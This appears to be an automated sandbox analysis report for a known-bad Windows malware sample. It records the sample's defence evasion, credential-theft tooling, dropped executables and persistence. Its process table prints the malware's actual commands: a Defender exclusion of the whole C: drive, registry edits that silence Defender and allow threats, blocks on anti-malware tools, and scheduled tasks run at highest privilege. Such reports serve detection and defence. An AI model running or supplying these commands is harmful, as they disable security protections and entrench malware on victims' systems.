Analysis Overview
SHA256: 3412cec072f1a9b403fcc7d2e8de28d0bde2d3a5a2e39089c519c2d12646b644
Threat Level: Known bad
The file 1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Modifies security service
Suspicious use of NtCreateUserProcessOtherParentProcess
Modifies Windows Defender notification settings
Detected Nirsoft tools
NirSoft WebBrowserPassView
Command and Scripting Interpreter: PowerShell
Possible privilege escalation attempt
Blocks application from running via registry modification
Loads dropped DLL
Checks BIOS information in registry
Checks computer location settings
Executes dropped EXE
Reads user/profile data of web browsers
Indicator Removal: Clear Windows Event Logs
Modifies file permissions
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Suspicious use of SetThreadContext
Drops file in System32 directory
UPX packed file
Drops file in Windows directory
Enumerates physical storage devices
Browser Information Discovery
Unsigned PE
System Location Discovery: System Language Discovery
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious behavior: CmdExeWriteProcessMemorySpam
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Scheduled Task/Job: Scheduled Task
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Modifies registry class
Kills process with taskkill
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Analysis: static1
Detonation Overview
Reported: 2024-10-07 10:38
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted: 2024-10-07 10:38
Reported: 2024-10-07 10:41
Platform: win7-20240729-en
Max time kernel: 149s
Max time network: 150s
Command Line: N/A
Signatures
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP | C:\Windows\System32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1608 created 432 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 1516 created 432 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocks application from running via registry modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "MBSetup.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "mbar.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "rkill.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "rkill32.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "mbam.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "MRT.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "rkill64.exe" | C:\Windows\system32\reg.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\$77main1.exe | N/A |
| N/A | N/A | C:\Users\$77Redownloader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\winhlp32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\splwow64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hh.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xwizard.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api64.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | api64.ipify.org | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\Recovery | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery\ReAgent.xml | C:\Windows\system32\ReAgentc.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1608 set thread context of 1740 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 1516 set thread context of 1392 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\SysWOW64\dllhost.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\$77svc64.job | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| File opened for modification | C:\Windows\Tasks\$77svc64.job | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| File opened for modification | C:\Windows\Tasks\$77svc64.job | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\appcompat\programs\RecentFileCache.bcf | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Tasks\$77svc32.job | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\Tasks\$77svc32.job | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| File opened for modification | C:\Windows\Tasks\$77svc32.job | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\winhlp32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\splwow64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\$77Redownloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\hh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\xwizard.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\$77main1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0d04b1da518db01 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\$77Redownloader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\winhlp32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\splwow64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hh.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xwizard.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\$77Redownloader.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| N/A | N/A | C:\Windows\system32\conhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
| Process | Command Line |
| C:\Windows\system32\winlogon.exe | winlogon.exe |
| C:\Windows\system32\services.exe | C:\Windows\system32\services.exe |
| C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe |
| C:\Windows\system32\lsm.exe | C:\Windows\system32\lsm.exe |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k RPCSS |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService |
| C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork |
| C:\Windows\system32\taskhost.exe | "taskhost.exe" |
| C:\Windows\system32\Dwm.exe | "C:\Windows\system32\Dwm.exe" |
| C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE |
| C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE" |
| C:\Windows\system32\wbem\wmiprvse.exe | C:\Windows\system32\wbem\wmiprvse.exe |
| C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation |
| C:\Windows\system32\sppsvc.exe | C:\Windows\system32\sppsvc.exe |
| C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe | "C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe" |
| C:\Users\$77main1.exe | "C:\Users\$77main1.exe" 0 |
| C:\Windows\system32\cmd.exe | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B635.tmp\B636.tmp\B637.bat C:\Users\$77main1.exe 0" |
| C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-1751213302-1385746122110234050-934115374-8464557901720287217-1526424837-1330299757" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe Add-MpPreference -ExclusionPath 'C:\' -Force |
| C:\Users\$77Redownloader.exe | "C:\Users\$77Redownloader.exe" -o"C:\Users\Admin\AppData\Local\Microsoft\Windows" -y |
| C:\Windows\system32\reg.exe | Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatIdDefaultAction" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147772079" /t REG_SZ /d "6" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147735505" /t REG_SZ /d "6" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147745502" /t REG_SZ /d "6" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t "REG_DWORD" /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "5" /t "REG_SZ" /d "6" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "1" /t "REG_SZ" /d "6" /f |
| C:\Windows\system32\timeout.exe | timeout 10 |
| C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" |
| C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe | "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe" |
| C:\Windows\system32\schtasks.exe | schtasks.exe /RU Admin /create /tn "$77Stellacy.job" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" /sc minute /mo 1 /RL HIGHEST /f |
| C:\Windows\system32\schtasks.exe | schtasks.exe /RU Admin /create /tn "$77SX.job" /tr "'C:\Windows\System32\Wscript.exe'C:\Users\Admin\AppData\Local\Microsoft\Windows\$77vbs.vbs" /sc minute /mo 40 /RL HIGHEST /f |
| C:\Windows\system32\schtasks.exe | schtasks /RU Admin /create /tn "$77STLR.job" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe" /sc onstart /RL HIGHEST /f |
| C:\Windows\system32\timeout.exe | timeout 10 |
| C:\Windows\system32\wbem\wmiprvse.exe | C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding |
| C:\Windows\system32\schtasks.exe | "schtasks" /create /tn "$77Quasar.job" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" /rl HIGHEST /f |
| C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe | "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4cciCKuj10fS4tEFtsNPmrL/0jPo2AcIdfc9jK0U15Lp5iXQGku3ZLiCUn4WwDSh+A0ftN5CXUAmVy5X4PPHFWMzuIK7S46Iv9KhQeGUN+idJw7zi086Au7DP0yct2lQY= |
| C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | "C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe" |
